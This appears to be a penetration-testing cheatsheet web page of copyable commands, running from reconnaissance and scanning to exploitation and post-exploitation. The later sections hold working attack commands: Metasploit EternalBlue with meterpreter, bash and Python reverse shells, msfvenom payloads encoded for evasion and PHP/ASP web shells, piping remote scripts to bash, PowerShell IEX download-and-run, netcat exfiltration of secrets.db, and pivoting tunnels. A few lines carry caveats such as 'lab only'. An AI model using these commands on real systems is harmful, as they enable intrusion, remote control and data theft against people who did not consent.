Penetration Testing & Vulnerability Research — Robust Cheatsheet

Commands gather domain info, DNS records, HTTP headers, and passive certificate/host data.

# Set target

                CopyTARGET=example.com

WHOIS lookup

                Copywhois $TARGET

DNS: A + MX + NS records

                Copydig +noall +answer $TARGET A
dig +noall +answer $TARGET MX
dig +noall +answer $TARGET NS

HTTP headers check

                Copycurl -I -L --max-redirs 5 https://$TARGET

Certificate names (crt.sh)

                Copycurl -s "https://crt.sh/?q=%25.$TARGET&output=json" | jq -r '.[].name_value' | sort -u

Passive OSINT (AUTHORIZED USE ONLY)

                Copytheharvester -d example.com -b google,bing,linkedin -l 500
shodan host 1.2.3.4

These dorks work across all major search engines and are crucial for external reconnaissance.

# Find sensitive files (.pdf, .xls) on target domain

                Copysite:target.com filetype:pdf confidential
site:target.com filetype:xls password

Find public login/admin panels

                Copyintitle:"login page" inurl:admin site:target.com

Find exposed configuration or log files

                Copyinurl:wp-config.php OR inurl:.env filetype:txt
intitle:"index of /" log

Find cached pages to check for old data exposure

                Copycache:https://target.com/page-with-old-data

Restrict results to a specific file type AND title match

                Copyintitle:"report" filetype:docx site:target.com

These checks help find security issues caused by poor communication between developers and search engine crawlers.

# Check for security-sensitive disallow rules in robots.txt

                Copycurl -s https://example.com/robots.txt | grep -i "disallow"

Identify sensitive meta robots tags (e.g., noindex on login forms) - Should return "noindex" for sensitive, non-public pages.

                Copygrep -i 'meta name="robots"' page_source.html

Check for canonical tag misconfigurations (points to non-HTTPS, wrong domain, or internal staging) - Command run locally on page source:

                Copygrep -i '<link rel="canonical"' page_source.html

Check for unintended parameter indexation (e.g., session IDs in URL) - Use a dork to check if Google/Bing indexed URLs with sensitive parameters:

                Copysite:example.com inurl:sessionid= OR inurl:PHPSESSID=

Use specialized tools to find indexation issues (e.g., using a sitemap scanner like Scrape-It)

                Copyscrape-it --sitemap https://example.com/sitemap.xml --check-robots

Uses Amass and Subfinder for comprehensive target scope, combining passive and active sources.

# Amass (passive + active + brute)

                Copyamass enum -d example.com -o amass.txt

Subfinder (fast passive)

                Copysubfinder -d example.com -o subfinder.txt

DNS recon

                Copydnsrecon -d example.com -t std,brt,srv

The Nmap command is a safe, thorough pattern: default scripts, service versions, all ports, fast timing, and output formats.

# Nmap (version, default scripts, full ports)

                Copynmap -sC -sV -p- -T4 --min-rate 1000 -oA nmap-full 192.0.2.0/24

Host discovery (ping scan)

                Copynmap -sn 192.0.2.0/24

Banner grab with netcat (HTTP 80)

                Copync -vz 192.0.2.10 80

Uses ffuf and gobuster for content discovery, filtering for common success status codes (200, 301, 302).

# ffuf (directory/file fuzzing)

                Copyffuf -u https://example.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,301,302 -o ffuf.json

gobuster (dir + vhost)

                Copygobuster dir -u https://example.com/ -w /usr/share/wordlists/dirb/common.txt -t 50 -o gobuster.txt

Tools for checking common application layer flaws and enumerating hidden parameters.

# nikto (webserver checks)

                Copynikto -h https://example.com -output nikto.txt

sqlmap (ONLY in-scope & lab)

                Copysqlmap -u "https://example.com/vuln.php?id=1" --batch --dbs

XSS testing (lab only)

                Copyxsstrike -u "https://example.com/page?param=1"

parameter discovery

                Copyarjun -u "https://example.com/page" -o arjun.txt

Uses open-source tools for infrastructure scanning (Nuclei) and dependency analysis (Syft/Grype).

# nuclei (fast templates)

                Copynuclei -l hosts.txt -t cves/ -o nuclei_results.txt

syft -> generate SBOM (Software Bill of Materials)

                Copysyft packages dir:./project -o json > sbom.json

grype -> scan SBOM

                Copygrype sbom:sbom.json

query NVD (example)

                Copycurl -s "https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2021-44228" | jq .

Standard tools for credential testing, hash cracking, and AD environment assessment.

# hydra (online bruteforce) - AUTHORIZED ONLY

                Copyhydra -L users.txt -P passwords.txt -t 4 ssh://192.0.2.10 -o hydra-ssh.txt

john / hashcat (offline cracking)

                Copyjohn --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt

impacket (examples: secretsdump)

                Copypython3 /opt/impacket/examples/secretsdump.py domain/USER:PASS -outputfile secrets

BloodHound collection

                CopyInvoke-BloodHound -CollectionMethod All -ZipFileName bloodhound.zip

A template workflow for using auxiliary and exploit modules in the Metasploit console.

# start msfconsole

                Copymsfconsole

search

                Copysearch cve:2017-0143
search type:exploit platform:windows smb

use exploit

                Copyuse exploit/windows/smb/ms17_010_eternalblue

show/set options

                Copyshow options
set RHOSTS 192.168.1.0/24
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.5

check (non-destructive)

                Copycheck

exploit (authorized/lab only)

                Copyexploit

Essential commands for establishing and maintaining remote access and internal host reconnaissance.

# netcat listener (catch reverse shells)

                Copync -lvnp 4444

bash reverse shell

                Copybash -i >& /dev/tcp/10.0.0.5/4444 0>&1

python reverse shell

                Copypython3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

linux enumeration (lab)

                Copycurl -s https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh | sh

windows enumeration

                Copy.\winpeas.exe

Commands for network diagnostics and assessing the cryptographic strength of web endpoints.

# tcpdump (capture 1000 packets on eth0)

                Copytcpdump -i eth0 -w capture.pcap -c 1000

tshark read (filter HTTP)

                Copytshark -r capture.pcap -Y "http" -T fields -e http.host -e http.request.uri

quick cert info

                Copyopenssl s_client -connect example.com:443 </dev/null 2>/dev/null | openssl x509 -noout -text

sslyze (comprehensive TLS scan)

                Copysslyze --regular example.com:443

Emphasizes local search (searchsploit) and the use of network-isolated containers to prevent lateral movement.

# searchsploit

                Copysearchsploit "CVE-2021-44228"
searchsploit -m 49993 # copy exploit by EDB ID

fetch PoC (read-only)

                Copycurl -sL "https://raw.githubusercontent.com/user/repo/branch/poc.py" -o /tmp/poc.py

run PoC inside an isolated, no-network container (safest approach)

                Copydocker run --rm -v /tmp/poc.py:/poc/poc.py --network none -it python:3.10 bash -c "python /poc/poc.py"

Tools used for analyzing executable file headers, assembly code, and preparing buffer overflow exploits.

# ELF inspection

                Copyreadelf -h binary
objdump -d binary | less
strings binary

radare2

                Copyr2 -AA binary

ropgadget (search for pop/ret gadgets)

                Copyropgadget --binary binary --only "pop|ret" > gadgets.txt

gdb + pwndbg (start debugging session)

                Copygdb -q ./binary

AFL is used for finding crashes in C/C++ binaries; Wfuzz is used for black-box web fuzzing.

# AFL (instrumented binary)

                Copyafl-fuzz -i in_dir -o out_dir -- ./target @@

wfuzz for HTTP (parameter discovery)

                Copywfuzz -c -z file,/usr/share/wordlists/parameters.txt --hc 404 "https://example.com/vuln?FUZZ=1"

Commands for static and dynamic analysis of Android apps and embedded system binaries.

# android decompile / inspect (apktool)

                Copyapktool d app.apk -o app_src

android decompile / inspect (jadx)

                Copyjadx -d out app.apk

frida (dynamic hooks) - authorized/lab only

                Copyfrida -U -f com.example.app -l script.js --no-pause

firmware extraction

                Copybinwalk -e firmware.bin
strings firmware.bin | grep -i password

Techniques to minimize risk via Docker isolation and ensure detailed test outcome logging.

# isolated container (no external network)

                Copydocker run --rm --network none -v $(pwd):/work -it ubuntu:22.04 bash

spin up target service in container (lab)

                Copydocker run --rm -p 8080:80 vuln-app:latest

logging with timestamps & tool version

                Copy(tool --version 2>&1 ; date; tool [args]) |& tee logfile.txt

save JSON where possible

                Copynuclei -l hosts.txt -o nuclei.json -oJ nuclei.json
ffuf -u https://example.com/FUZZ -w /wordlist.txt -o ffuf.json -of json

Use the '-e' flag for evasion (encoding) and the '-f' flag for different output formats.

Windows Reverse Shell (Encoded 3 times)

                Copymsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > /root/Desktop/payload-enc.exe

Linux Python Reverse Shell (Raw Output, useful for injection)

                Copymsfvenom -p cmd/unix/reverse_python LHOST=10.0.0.5 LPORT=4444 -f raw

Windows ASP Payload for Web Server Injection

                Copymsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f asp > shell.asp

PHP Web Shell for Upload Vulnerabilities

                Copymsfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f raw > shell.php

Raw Linux x64 Shellcode (C format)

                Copymsfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f c

Essential techniques using native binaries (curl, wget) and common languages (Python, Netcat).

# Attacker: Python HTTP Server (Serving files)

                Copypython3 -m http.server 8000

Target (Linux): Download file via wget (Attacker IP: 10.0.0.5)

                Copywget http://10.0.0.5:8000/tool.sh

Target (Linux): Download file via curl (In-Memory execution, safer)

                Copycurl http://10.0.0.5:8000/script.sh | bash

Attacker: Netcat Listener (Receive file: 'data.txt' from target)

                Copync -l -p 8888 > received_data.txt

Target: Netcat Transfer (Send file: 'secrets.db' to Attacker IP: 10.0.0.5)

                Copync 10.0.0.5 8888 < secrets.db

Target (Windows): Download file via PowerShell (IEX)

                CopyIEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/shell.ps1')

Utilizing SSH, Meterpreter, and native tools to create port forwards and SOCKS proxies.

# Local SSH Port Forward (Tunnel local port to remote target)

                Copyssh -L 8080:192.168.1.10:80 user@jumpbox.corp

Reverse SSH Tunnel (Target connects back to attacker to create a forward)

                Copyssh -R 9000:127.0.0.1:80 user@10.0.0.5

Metasploit Portfwd (Meterpreter session: tunnel target-side port to local)

                Copyportfwd add -l 3389 -r 192.168.1.15 -p 3389

SOCKS Proxy via Metasploit (Enable proxy via a Meterpreter session)

                Copyuse auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1080
run

Chisel (Attacker: SOCKS server)

                Copy./chisel server -p 8000 --socks5

Chisel (Target: Connect to server and create tunnel)

                Copy./chisel client 10.0.0.5:8000 R:1080:socks